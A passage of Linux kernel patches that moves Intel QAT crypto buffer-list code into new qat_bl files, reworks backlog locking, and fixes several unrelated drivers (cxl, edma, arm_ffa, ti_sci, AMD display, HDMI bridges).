+@@ -1230,7 +1051,7 @@ static int qat_alg_skcipher_encrypt(struct skcipher_request *req)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &req->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+@@ -1275,7 +1096,8 @@ static int qat_alg_skcipher_decrypt(struct skcipher_request *req)
+ 	if (req->cryptlen == 0)
+ 		return 0;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, req->src, req->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, req->src, req->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1297,7 +1119,7 @@ static int qat_alg_skcipher_decrypt(struct skcipher_request *req)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &req->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/crypto/qat/qat_common/qat_algs_send.c b/drivers/crypto/qat/qat_common/qat_algs_send.c
+index ff5b4347f7831..607ed88f4b197 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs_send.c
++++ b/drivers/crypto/qat/qat_common/qat_algs_send.c
+@@ -39,40 +39,44 @@ void qat_alg_send_backlog(struct qat_instance_backlog *backlog)
+ 	spin_unlock_bh(&backlog->lock);
+ }
+ 
+-static void qat_alg_backlog_req(struct qat_alg_req *req,
+-				struct qat_instance_backlog *backlog)
+-{
+-	INIT_LIST_HEAD(&req->list);
+-
+-	spin_lock_bh(&backlog->lock);
+-	list_add_tail(&req->list, &backlog->list);
+-	spin_unlock_bh(&backlog->lock);
+-}
+-
+-static int qat_alg_send_message_maybacklog(struct qat_alg_req *req)
++static bool qat_alg_try_enqueue(struct qat_alg_req *req)
+ {
+ 	struct qat_instance_backlog *backlog = req->backlog;
+ 	struct adf_etr_ring_data *tx_ring = req->tx_ring;
+ 	u32 *fw_req = req->fw_req;
+ 
+-	/* If any request is already backlogged, then add to backlog list */
++	/* Check if any request is already backlogged */
+ 	if (!list_empty(&backlog->list))
+-		goto enqueue;
++		return false;
+ 
+-	/* If ring is nearly full, then add to backlog list */
++	/* Check if ring is nearly full */
+ 	if (adf_ring_nearly_full(tx_ring))
+-		goto enqueue;
++		return false;
+ 
+-	/* If adding request to HW ring fails, then add to backlog list */
++	/* Try to enqueue to HW ring */
+ 	if (adf_send_message(tx_ring, fw_req))
+-		goto enqueue;
++		return false;
+ 
+-	return -EINPROGRESS;
++	return true;
++}
+ 
+-enqueue:
+-	qat_alg_backlog_req(req, backlog);
+ 
+-	return -EBUSY;
++static int qat_alg_send_message_maybacklog(struct qat_alg_req *req)
++{
++	struct qat_instance_backlog *backlog = req->backlog;
++	int ret = -EINPROGRESS;
++
++	if (qat_alg_try_enqueue(req))
++		return ret;
++
++	spin_lock_bh(&backlog->lock);
++	if (!qat_alg_try_enqueue(req)) {
++		list_add_tail(&req->list, &backlog->list);
++		ret = -EBUSY;
++	}
++	spin_unlock_bh(&backlog->lock);
++
++	return ret;
+ }
+ 
+ int qat_alg_send_message(struct qat_alg_req *req)
+diff --git a/drivers/crypto/qat/qat_common/qat_bl.c b/drivers/crypto/qat/qat_common/qat_bl.c
+new file mode 100644
+index 0000000000000..221a4eb610a38
+--- /dev/null
++++ b/drivers/crypto/qat/qat_common/qat_bl.c
+@@ -0,0 +1,224 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/* Copyright(c) 2014 - 2022 Intel Corporation */
++#include <linux/device.h>
++#include <linux/dma-mapping.h>
++#include <linux/pci.h>
++#include <linux/scatterlist.h>
++#include <linux/slab.h>
++#include <linux/types.h>
++#include "adf_accel_devices.h"
++#include "qat_bl.h"
++#include "qat_crypto.h"
++
++void qat_bl_free_bufl(struct adf_accel_dev *accel_dev,
++		      struct qat_request_buffs *buf)
++{
++	struct device *dev = &GET_DEV(accel_dev);
++	struct qat_alg_buf_list *bl = buf->bl;
++	struct qat_alg_buf_list *blout = buf->blout;
++	dma_addr_t blp = buf->blp;
++	dma_addr_t blpout = buf->bloutp;
++	size_t sz = buf->sz;
++	size_t sz_out = buf->sz_out;
++	int bl_dma_dir;
++	int i;
++
++	bl_dma_dir = blp != blpout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
++
++	for (i = 0; i < bl->num_bufs; i++)
++		dma_unmap_single(dev, bl->bufers[i].addr,
++				 bl->bufers[i].len, bl_dma_dir);
++
++	dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
++
++	if (!buf->sgl_src_valid)
++		kfree(bl);
++
++	if (blp != blpout) {
++		for (i = 0; i < blout->num_mapped_bufs; i++) {
++			dma_unmap_single(dev, blout->bufers[i].addr,
++					 blout->bufers[i].len,
++					 DMA_FROM_DEVICE);
++		}
++		dma_unmap_single(dev, blpout, sz_out, DMA_TO_DEVICE);
++
++		if (!buf->sgl_dst_valid)
++			kfree(blout);
++	}
++}
++
++static int __qat_bl_sgl_to_bufl(struct adf_accel_dev *accel_dev,
++				struct scatterlist *sgl,
++				struct scatterlist *sglout,
++				struct qat_request_buffs *buf,
++				dma_addr_t extra_dst_buff,
++				size_t sz_extra_dst_buff,
++				gfp_t flags)
++{
++	struct device *dev = &GET_DEV(accel_dev);
++	int i, sg_nctr = 0;
++	int n = sg_nents(sgl);
++	struct qat_alg_buf_list *bufl;
++	struct qat_alg_buf_list *buflout = NULL;
++	dma_addr_t blp = DMA_MAPPING_ERROR;
++	dma_addr_t bloutp = DMA_MAPPING_ERROR;
++	struct scatterlist *sg;
++	size_t sz_out, sz = struct_size(bufl, bufers, n);
++	int node = dev_to_node(&GET_DEV(accel_dev));
++	int bufl_dma_dir;
++
++	if (unlikely(!n))
++		return -EINVAL;
++
++	buf->sgl_src_valid = false;
++	buf->sgl_dst_valid = false;
++
++	if (n > QAT_MAX_BUFF_DESC) {
++		bufl = kzalloc_node(sz, flags, node);
++		if (unlikely(!bufl))
++			return -ENOMEM;
++	} else {
++		bufl = &buf->sgl_src.sgl_hdr;
++		memset(bufl, 0, sizeof(struct qat_alg_buf_list));
++		buf->sgl_src_valid = true;
++	}
++
++	bufl_dma_dir = sgl != sglout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
++
++	for (i = 0; i < n; i++)
++		bufl->bufers[i].addr = DMA_MAPPING_ERROR;
++
++	for_each_sg(sgl, sg, n, i) {
++		int y = sg_nctr;
++
++		if (!sg->length)
++			continue;
++
++		bufl->bufers[y].addr = dma_map_single(dev, sg_virt(sg),
++						      sg->length,
++						      bufl_dma_dir);
++		bufl->bufers[y].len = sg->length;
++		if (unlikely(dma_mapping_error(dev, bufl->bufers[y].addr)))
++			goto err_in;
++		sg_nctr++;
++	}
++	bufl->num_bufs = sg_nctr;
++	blp = dma_map_single(dev, bufl, sz, DMA_TO_DEVICE);
++	if (unlikely(dma_mapping_error(dev, blp)))
++		goto err_in;
++	buf->bl = bufl;
++	buf->blp = blp;
++	buf->sz = sz;
++	/* Handle out of place operation */
++	if (sgl != sglout) {
++		struct qat_alg_buf *bufers;
++		int extra_buff = extra_dst_buff ? 1 : 0;
++		int n_sglout = sg_nents(sglout);
++
++		n = n_sglout + extra_buff;
++		sz_out = struct_size(buflout, bufers, n);
++		sg_nctr = 0;
++
++		if (n > QAT_MAX_BUFF_DESC) {
++			buflout = kzalloc_node(sz_out, flags, node);
++			if (unlikely(!buflout))
++				goto err_in;
++		} else {
++			buflout = &buf->sgl_dst.sgl_hdr;
++			memset(buflout, 0, sizeof(struct qat_alg_buf_list));
++			buf->sgl_dst_valid = true;
++		}
++
++		bufers = buflout->bufers;
++		for (i = 0; i < n; i++)
++			bufers[i].addr = DMA_MAPPING_ERROR;
++
++		for_each_sg(sglout, sg, n_sglout, i) {
++			int y = sg_nctr;
++
++			if (!sg->length)
++				continue;
++
++			bufers[y].addr = dma_map_single(dev, sg_virt(sg),
++							sg->length,
++							DMA_FROM_DEVICE);
++			if (unlikely(dma_mapping_error(dev, bufers[y].addr)))
++				goto err_out;
++			bufers[y].len = sg->length;
++			sg_nctr++;
++		}
++		if (extra_buff) {
++			bufers[sg_nctr].addr = extra_dst_buff;
++			bufers[sg_nctr].len = sz_extra_dst_buff;
++		}
++
++		buflout->num_bufs = sg_nctr;
++		buflout->num_bufs += extra_buff;
++		buflout->num_mapped_bufs = sg_nctr;
++		bloutp = dma_map_single(dev, buflout, sz_out, DMA_TO_DEVICE);
++		if (unlikely(dma_mapping_error(dev, bloutp)))
++			goto err_out;
++		buf->blout = buflout;
++		buf->bloutp = bloutp;
++		buf->sz_out = sz_out;
++	} else {
++		/* Otherwise set the src and dst to the same address */
++		buf->bloutp = buf->blp;
++		buf->sz_out = 0;
++	}
++	return 0;
++
++err_out:
++	if (!dma_mapping_error(dev, bloutp))
++		dma_unmap_single(dev, bloutp, sz_out, DMA_TO_DEVICE);
++
++	n = sg_nents(sglout);
++	for (i = 0; i < n; i++) {
++		if (buflout->bufers[i].addr == extra_dst_buff)
++			break;
++		if (!dma_mapping_error(dev, buflout->bufers[i].addr))
++			dma_unmap_single(dev, buflout->bufers[i].addr,
++					 buflout->bufers[i].len,
++					 DMA_FROM_DEVICE);
++	}
++
++	if (!buf->sgl_dst_valid)
++		kfree(buflout);
++
++err_in:
++	if (!dma_mapping_error(dev, blp))
++		dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
++
++	n = sg_nents(sgl);
++	for (i = 0; i < n; i++)
++		if (!dma_mapping_error(dev, bufl->bufers[i].addr))
++			dma_unmap_single(dev, bufl->bufers[i].addr,
++					 bufl->bufers[i].len,
++					 bufl_dma_dir);
++
++	if (!buf->sgl_src_valid)
++		kfree(bufl);
++
++	dev_err(dev, "Failed to map buf for dma\n");
++	return -ENOMEM;
++}
++
++int qat_bl_sgl_to_bufl(struct adf_accel_dev *accel_dev,
++		       struct scatterlist *sgl,
++		       struct scatterlist *sglout,
++		       struct qat_request_buffs *buf,
++		       struct qat_sgl_to_bufl_params *params,
++		       gfp_t flags)
++{
++	dma_addr_t extra_dst_buff = 0;
++	size_t sz_extra_dst_buff = 0;
++
++	if (params) {
++		extra_dst_buff = params->extra_dst_buff;
++		sz_extra_dst_buff = params->sz_extra_dst_buff;
++	}
++
++	return __qat_bl_sgl_to_bufl(accel_dev, sgl, sglout, buf,
++				    extra_dst_buff, sz_extra_dst_buff,
++				    flags);
++}
+diff --git a/drivers/crypto/qat/qat_common/qat_bl.h b/drivers/crypto/qat/qat_common/qat_bl.h
+new file mode 100644
+index 0000000000000..0c174fee9e645
+--- /dev/null
++++ b/drivers/crypto/qat/qat_common/qat_bl.h
+@@ -0,0 +1,55 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++/* Copyright(c) 2014 - 2022 Intel Corporation */
++#ifndef QAT_BL_H
++#define QAT_BL_H
++#include <linux/scatterlist.h>
++#include <linux/types.h>
++
++#define QAT_MAX_BUFF_DESC	4
++
++struct qat_alg_buf {
++	u32 len;
++	u32 resrvd;
++	u64 addr;
++} __packed;
++
++struct qat_alg_buf_list {
++	u64 resrvd;
++	u32 num_bufs;
++	u32 num_mapped_bufs;
++	struct qat_alg_buf bufers[];
++} __packed;
++
++struct qat_alg_fixed_buf_list {
++	struct qat_alg_buf_list sgl_hdr;
++	struct qat_alg_buf descriptors[QAT_MAX_BUFF_DESC];
++} __packed __aligned(64);
++
++struct qat_request_buffs {
++	struct qat_alg_buf_list *bl;
++	dma_addr_t blp;
++	struct qat_alg_buf_list *blout;
++	dma_addr_t bloutp;
++	size_t sz;
++	size_t sz_out;
++	bool sgl_src_valid;
++	bool sgl_dst_valid;
++	struct qat_alg_fixed_buf_list sgl_src;
++	struct qat_alg_fixed_buf_list sgl_dst;
++};
++
++struct qat_sgl_to_bufl_params {
++	dma_addr_t extra_dst_buff;
++	size_t sz_extra_dst_buff;
++};
++
++void qat_bl_free_bufl(struct adf_accel_dev *accel_dev,
++		      struct qat_request_buffs *buf);
++int qat_bl_sgl_to_bufl(struct adf_accel_dev *accel_dev,
++		       struct scatterlist *sgl,
++		       struct scatterlist *sglout,
++		       struct qat_request_buffs *buf,
++		       struct qat_sgl_to_bufl_params *params,
++		       gfp_t flags);
++
++#endif
+diff --git a/drivers/crypto/qat/qat_common/qat_crypto.h b/drivers/crypto/qat/qat_common/qat_crypto.h
+index df3c738ce323a..bb116357a5684 100644
+--- a/drivers/crypto/qat/qat_common/qat_crypto.h
++++ b/drivers/crypto/qat/qat_common/qat_crypto.h
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include "adf_accel_devices.h"
+ #include "icp_qat_fw_la.h"
++#include "qat_bl.h"
+ 
+ struct qat_instance_backlog {
+ 	struct list_head list;
+@@ -35,39 +36,6 @@ struct qat_crypto_instance {
+ 	struct qat_instance_backlog backlog;
+ };
+ 
+-#define QAT_MAX_BUFF_DESC	4
+-
+-struct qat_alg_buf {
+-	u32 len;
+-	u32 resrvd;
+-	u64 addr;
+-} __packed;
+-
+-struct qat_alg_buf_list {
+-	u64 resrvd;
+-	u32 num_bufs;
+-	u32 num_mapped_bufs;
+-	struct qat_alg_buf bufers[];
+-} __packed;
+-
+-struct qat_alg_fixed_buf_list {
+-	struct qat_alg_buf_list sgl_hdr;
+-	struct qat_alg_buf descriptors[QAT_MAX_BUFF_DESC];
+-} __packed __aligned(64);
+-
+-struct qat_crypto_request_buffs {
+-	struct qat_alg_buf_list *bl;
+-	dma_addr_t blp;
+-	struct qat_alg_buf_list *blout;
+-	dma_addr_t bloutp;
+-	size_t sz;
+-	size_t sz_out;
+-	bool sgl_src_valid;
+-	bool sgl_dst_valid;
+-	struct qat_alg_fixed_buf_list sgl_src;
+-	struct qat_alg_fixed_buf_list sgl_dst;
+-};
+-
+ struct qat_crypto_request;
+ 
+ struct qat_crypto_request {
+@@ -80,7 +48,7 @@ struct qat_crypto_request {
+ 		struct aead_request *aead_req;
+ 		struct skcipher_request *skcipher_req;
+ 	};
+-	struct qat_crypto_request_buffs buf;
++	struct qat_request_buffs buf;
+ 	void (*cb)(struct icp_qat_fw_la_resp *resp,
+ 		   struct qat_crypto_request *req);
+ 	union {
+diff --git a/drivers/cxl/core/memdev.c b/drivers/cxl/core/memdev.c
+index 20ce488a77540..03cf99cce7047 100644
+--- a/drivers/cxl/core/memdev.c
++++ b/drivers/cxl/core/memdev.c
+@@ -214,8 +214,8 @@ static void cxl_memdev_unregister(void *_cxlmd)
+ 	struct cxl_memdev *cxlmd = _cxlmd;
+ 	struct device *dev = &cxlmd->dev;
+ 
+-	cxl_memdev_shutdown(dev);
+ 	cdev_device_del(&cxlmd->cdev, dev);
++	cxl_memdev_shutdown(dev);
+ 	put_device(dev);
+ }
+ 
+diff --git a/drivers/devfreq/event/rockchip-dfi.c b/drivers/devfreq/event/rockchip-dfi.c
+index 39ac069cabc75..74893c06aa087 100644
+--- a/drivers/devfreq/event/rockchip-dfi.c
++++ b/drivers/devfreq/event/rockchip-dfi.c
+@@ -193,14 +193,15 @@ static int rockchip_dfi_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(data->clk),
+ 				     "Cannot get the clk pclk_ddr_mon\n");
+ 
+-	/* try to find the optional reference to the pmu syscon */
+ 	node = of_parse_phandle(np, "rockchip,pmu", 0);
+-	if (node) {
+-		data->regmap_pmu = syscon_node_to_regmap(node);
+-		of_node_put(node);
+-		if (IS_ERR(data->regmap_pmu))
+-			return PTR_ERR(data->regmap_pmu);
+-	}
++	if (!node)
++		return dev_err_probe(&pdev->dev, -ENODEV, "Can't find pmu_grf registers\n");
++
++	data->regmap_pmu = syscon_node_to_regmap(node);
++	of_node_put(node);
++	if (IS_ERR(data->regmap_pmu))
++		return PTR_ERR(data->regmap_pmu);
++
+ 	data->dev = dev;
+ 
+ 	desc = devm_kzalloc(dev, sizeof(*desc), GFP_KERNEL);
+diff --git a/drivers/dma/idxd/Makefile b/drivers/dma/idxd/Makefile
+index a1e9f2b3a37cc..817ffa95a9b11 100644
+--- a/drivers/dma/idxd/Makefile
++++ b/drivers/dma/idxd/Makefile
+@@ -1,12 +1,12 @@
+ ccflags-y += -DDEFAULT_SYMBOL_NAMESPACE=IDXD
+ 
++obj-$(CONFIG_INTEL_IDXD_BUS) += idxd_bus.o
++idxd_bus-y := bus.o
++
+ obj-$(CONFIG_INTEL_IDXD) += idxd.o
+ idxd-y := init.o irq.o device.o sysfs.o submit.o dma.o cdev.o
+ 
+ idxd-$(CONFIG_INTEL_IDXD_PERFMON) += perfmon.o
+ 
+-obj-$(CONFIG_INTEL_IDXD_BUS) += idxd_bus.o
+-idxd_bus-y := bus.o
+-
+ obj-$(CONFIG_INTEL_IDXD_COMPAT) += idxd_compat.o
+ idxd_compat-y := compat.o
+diff --git a/drivers/dma/pxa_dma.c b/drivers/dma/pxa_dma.c
+index 22a392fe6d32b..04c1f2ee874a5 100644
+--- a/drivers/dma/pxa_dma.c
++++ b/drivers/dma/pxa_dma.c
+@@ -722,7 +722,6 @@ static void pxad_free_desc(struct virt_dma_desc *vd)
+ 	dma_addr_t dma;
+ 	struct pxad_desc_sw *sw_desc = to_pxad_sw_desc(vd);
+ 
+-	BUG_ON(sw_desc->nb_desc == 0);
+ 	for (i = sw_desc->nb_desc - 1; i >= 0; i--) {
+ 		if (i > 0)
+ 			dma = sw_desc->hw_desc[i - 1]->ddadr;
+diff --git a/drivers/dma/ti/edma.c b/drivers/dma/ti/edma.c
+index fa06d7e6d8e38..7ec6e5d728b03 100644
+--- a/drivers/dma/ti/edma.c
++++ b/drivers/dma/ti/edma.c
+@@ -2410,7 +2410,7 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq < 0 && node)
+ 		irq = irq_of_parse_and_map(node, 0);
+ 
+-	if (irq >= 0) {
++	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccint",
+ 					  dev_name(dev));
+ 		ret = devm_request_irq(dev, irq, dma_irq_handler, 0, irq_name,
+@@ -2426,7 +2426,7 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq < 0 && node)
+ 		irq = irq_of_parse_and_map(node, 2);
+ 
+-	if (irq >= 0) {
++	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccerrint",
+ 					  dev_name(dev));
+ 		ret = devm_request_irq(dev, irq, dma_ccerr_handler, 0, irq_name,
+diff --git a/drivers/firmware/arm_ffa/bus.c b/drivers/firmware/arm_ffa/bus.c
+index b9ce784f087df..248594b59c64d 100644
+--- a/drivers/firmware/arm_ffa/bus.c
++++ b/drivers/firmware/arm_ffa/bus.c
+@@ -193,6 +193,7 @@ struct ffa_device *ffa_device_register(const uuid_t *uuid, int vm_id,
+ 	dev->release = ffa_release_device;
+ 	dev_set_name(&ffa_dev->dev, "arm-ffa-%d", id);
+ 
++	ffa_dev->id = id;
+ 	ffa_dev->vm_id = vm_id;
+ 	ffa_dev->ops = ops;
+ 	uuid_copy(&ffa_dev->uuid, uuid);
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index 21481fc05800f..e9f86b7573012 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -668,17 +668,9 @@ static int ffa_partition_info_get(const char *uuid_str,
+ 	return 0;
+ }
+ 
+-static void _ffa_mode_32bit_set(struct ffa_device *dev)
+-{
+-	dev->mode_32bit = true;
+-}
+-
+ static void ffa_mode_32bit_set(struct ffa_device *dev)
+ {
+-	if (drv_info->version > FFA_VERSION_1_0)
+-		return;
+-
+-	_ffa_mode_32bit_set(dev);
++	dev->mode_32bit = true;
+ }
+ 
+ static int ffa_sync_send_receive(struct ffa_device *dev,
+@@ -787,7 +779,7 @@ static void ffa_setup_partitions(void)
+ 
+ 		if (drv_info->version > FFA_VERSION_1_0 &&
+ 		    !(tpbuf->properties & FFA_PARTITION_AARCH64_EXEC))
+-			_ffa_mode_32bit_set(ffa_dev);
++			ffa_mode_32bit_set(ffa_dev);
+ 	}
+ 	kfree(pbuf);
+ }
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index 4c550cfbc086c..597d1a367d96d 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -190,19 +190,6 @@ static int ti_sci_debugfs_create(struct platform_device *pdev,
+ 	return 0;
+ }
+ 
+-/**
+- * ti_sci_debugfs_destroy() - clean up log debug file
+- * @pdev:	platform device pointer
+- * @info:	Pointer to SCI entity information
+- */
+-static void ti_sci_debugfs_destroy(struct platform_device *pdev,
+-				   struct ti_sci_info *info)
+-{
+-	if (IS_ERR(info->debug_region))
+-		return;
+-
+-	debugfs_remove(info->d);
+-}
+ #else /* CONFIG_DEBUG_FS */
+ static inline int ti_sci_debugfs_create(struct platform_device *dev,
+ 					struct ti_sci_info *info)
+@@ -3451,43 +3438,12 @@ out:
+ 	return ret;
+ }
+ 
+-static int ti_sci_remove(struct platform_device *pdev)
+-{
+-	struct ti_sci_info *info;
+-	struct device *dev = &pdev->dev;
+-	int ret = 0;
+-
+-	of_platform_depopulate(dev);
+-
+-	info = platform_get_drvdata(pdev);
+-
+-	if (info->nb.notifier_call)
+-		unregister_restart_handler(&info->nb);
+-
+-	mutex_lock(&ti_sci_list_mutex);
+-	if (info->users)
+-		ret = -EBUSY;
+-	else
+-		list_del(&info->node);
+-	mutex_unlock(&ti_sci_list_mutex);
+-
+-	if (!ret) {
+-		ti_sci_debugfs_destroy(pdev, info);
+-
+-		/* Safe to free channels since no more users */
+-		mbox_free_channel(info->chan_tx);
+-		mbox_free_channel(info->chan_rx);
+-	}
+-
+-	return ret;
+-}
+-
+ static struct platform_driver ti_sci_driver = {
+ 	.probe = ti_sci_probe,
+-	.remove = ti_sci_remove,
+ 	.driver = {
+ 		   .name = "ti-sci",
+ 		   .of_match_table = of_match_ptr(ti_sci_of_match),
++		   .suppress_bind_attrs = true,
+ 	},
+ };
+ module_platform_driver(ti_sci_driver);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index 63feea08904cb..d7e758c86a0b8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -487,11 +487,11 @@ svm_range_validate_svm_bo(struct amdgpu_device *adev, struct svm_range *prange)
+ 
+ 	/* We need a new svm_bo. Spin-loop to wait for concurrent
+ 	 * svm_range_bo_release to finish removing this range from
+-	 * its range list. After this, it is safe to reuse the
+-	 * svm_bo pointer and svm_bo_list head.
++	 * its range list and set prange->svm_bo to null. After this,
++	 * it is safe to reuse the svm_bo pointer and svm_bo_list head.
+ 	 */
+-	while (!list_empty_careful(&prange->svm_bo_list))
+-		;
++	while (!list_empty_careful(&prange->svm_bo_list) || prange->svm_bo)
++		cond_resched();
+ 
+ 	return false;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 339f1f5a08339..42e266e074d1d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -9626,16 +9626,27 @@ static void dm_get_oriented_plane_size(struct drm_plane_state *plane_state,
+ 	}
+ }
+ 
++static void
++dm_get_plane_scale(struct drm_plane_state *plane_state,
++		   int *out_plane_scale_w, int *out_plane_scale_h)
++{
++	int plane_src_w, plane_src_h;
++
++	dm_get_oriented_plane_size(plane_state, &plane_src_w, &plane_src_h);
++	*out_plane_scale_w = plane_state->crtc_w * 1000 / plane_src_w;
++	*out_plane_scale_h = plane_state->crtc_h * 1000 / plane_src_h;
++}
++
+ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 				struct drm_crtc *crtc,
+ 				struct drm_crtc_state *new_crtc_state)
+ {
+-	struct drm_plane *cursor = crtc->cursor, *underlying;
++	struct drm_plane *cursor = crtc->cursor, *plane, *underlying;
++	struct drm_plane_state *old_plane_state, *new_plane_state;
+ 	struct drm_plane_state *new_cursor_state, *new_underlying_state;
+ 	int i;
+ 	int cursor_scale_w, cursor_scale_h, underlying_scale_w, underlying_scale_h;
+-	int cursor_src_w, cursor_src_h;
+-	int underlying_src_w, underlying_src_h;
++	bool any_relevant_change = false;
+ 
+ 	/* On DCE and DCN there is no dedicated hardware cursor plane. We get a
+ 	 * cursor per pipe but it's going to inherit the scaling and
+@@ -9643,13 +9654,50 @@ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 	 * blending properties match the underlying planes'.
+ 	 */
+ 
+-	new_cursor_state = drm_atomic_get_new_plane_state(state, cursor);
+-	if (!new_cursor_state || !new_cursor_state->fb)
++	/* If no plane was enabled or changed scaling, no need to check again */
++	for_each_oldnew_plane_in_state(state, plane, old_plane_state, new_plane_state, i) {
++		int new_scale_w, new_scale_h, old_scale_w, old_scale_h;
++
++		if (!new_plane_state || !new_plane_state->fb || new_plane_state->crtc != crtc)
++			continue;
++
++		if (!old_plane_state || !old_plane_state->fb || old_plane_state->crtc != crtc) {
++			any_relevant_change = true;
++			break;
++		}
++
++		if (new_plane_state->fb == old_plane_state->fb &&
++		    new_plane_state->crtc_w == old_plane_state->crtc_w &&
++		    new_plane_state->crtc_h == old_plane_state->crtc_h)
++			continue;
++
++		dm_get_plane_scale(new_plane_state, &new_scale_w, &new_scale_h);
++		dm_get_plane_scale(old_plane_state, &old_scale_w, &old_scale_h);
++
++		if (new_scale_w != old_scale_w || new_scale_h != old_scale_h) {
++			any_relevant_change = true;
++			break;
++		}
++	}
++
++	if (!any_relevant_change)
++		return 0;
++
++	new_cursor_state = drm_atomic_get_plane_state(state, cursor);
++	if (IS_ERR(new_cursor_state))
++		return PTR_ERR(new_cursor_state);
++
++	if (!new_cursor_state->fb)
+ 		return 0;
+ 
+-	dm_get_oriented_plane_size(new_cursor_state, &cursor_src_w, &cursor_src_h);
+-	cursor_scale_w = new_cursor_state->crtc_w * 1000 / cursor_src_w;
+-	cursor_scale_h = new_cursor_state->crtc_h * 1000 / cursor_src_h;
++	dm_get_plane_scale(new_cursor_state, &cursor_scale_w, &cursor_scale_h);
++
++	/* Need to check all enabled planes, even if this commit doesn't change
++	 * their state
++	 */
++	i = drm_atomic_add_affected_planes(state, crtc);
++	if (i)
++		return i;
+ 
+ 	for_each_new_plane_in_state_reverse(state, underlying, new_underlying_state, i) {
+ 		/* Narrow down to non-cursor planes on the same CRTC as the cursor */
+@@ -9660,10 +9708,8 @@ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 		if (!new_underlying_state->fb)
+ 			continue;
+ 
+-		dm_get_oriented_plane_size(new_underlying_state,
+-					   &underlying_src_w, &underlying_src_h);
+-		underlying_scale_w = new_underlying_state->crtc_w * 1000 / underlying_src_w;
+-		underlying_scale_h = new_underlying_state->crtc_h * 1000 / underlying_src_h;
++		dm_get_plane_scale(new_underlying_state,
++				   &underlying_scale_w, &underlying_scale_h);
+ 
+ 		if (cursor_scale_w != underlying_scale_w ||
+ 		    cursor_scale_h != underlying_scale_h) {
+diff --git a/drivers/gpu/drm/bridge/ite-it66121.c b/drivers/gpu/drm/bridge/ite-it66121.c
+index 4f6f1deba28c6..9d7f3c99748b4 100644
+--- a/drivers/gpu/drm/bridge/ite-it66121.c
++++ b/drivers/gpu/drm/bridge/ite-it66121.c
+@@ -1464,10 +1464,14 @@ static int it66121_audio_get_eld(struct device *dev, void *data,
+ 	struct it66121_ctx *ctx = dev_get_drvdata(dev);
+ 
+ 	mutex_lock(&ctx->lock);
+-
+-	memcpy(buf, ctx->connector->eld,
+-	       min(sizeof(ctx->connector->eld), len));
+-
++	if (!ctx->connector) {
++		/* Pass an empty ELD if connector not available */
++		dev_dbg(dev, "No connector present, passing empty ELD data");
++		memset(buf, 0, len);
++	} else {
++		memcpy(buf, ctx->connector->eld,
++		       min(sizeof(ctx->connector->eld), len));
++	}
+ 	mutex_unlock(&ctx->lock);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index 5e419934d2a39..ac76c23635892 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -45,7 +45,6 @@ struct lt8912 {
+ 
+ 	u8 data_lanes;
+ 	bool is_power_on;
+-	bool is_attached;
+ };
+ 
+ static int lt8912_write_init_config(struct lt8912 *lt)
+@@ -516,14 +515,27 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 	return 0;
+ }
+ 
++static void lt8912_bridge_hpd_cb(void *data, enum drm_connector_status status)
++{
++	struct lt8912 *lt = data;
++
++	if (lt->bridge.dev)
++		drm_helper_hpd_irq_event(lt->bridge.dev);
++}
++
+ static int lt8912_bridge_connector_init(struct drm_bridge *bridge)
+ {
+ 	int ret;
+ 	struct lt8912 *lt = bridge_to_lt8912(bridge);
+ 	struct drm_connector *connector = &lt->connector;
+ 
+-	connector->polled = DRM_CONNECTOR_POLL_CONNECT |
+-			    DRM_CONNECTOR_POLL_DISCONNECT;
++	if (lt->hdmi_port->ops & DRM_BRIDGE_OP_HPD) {
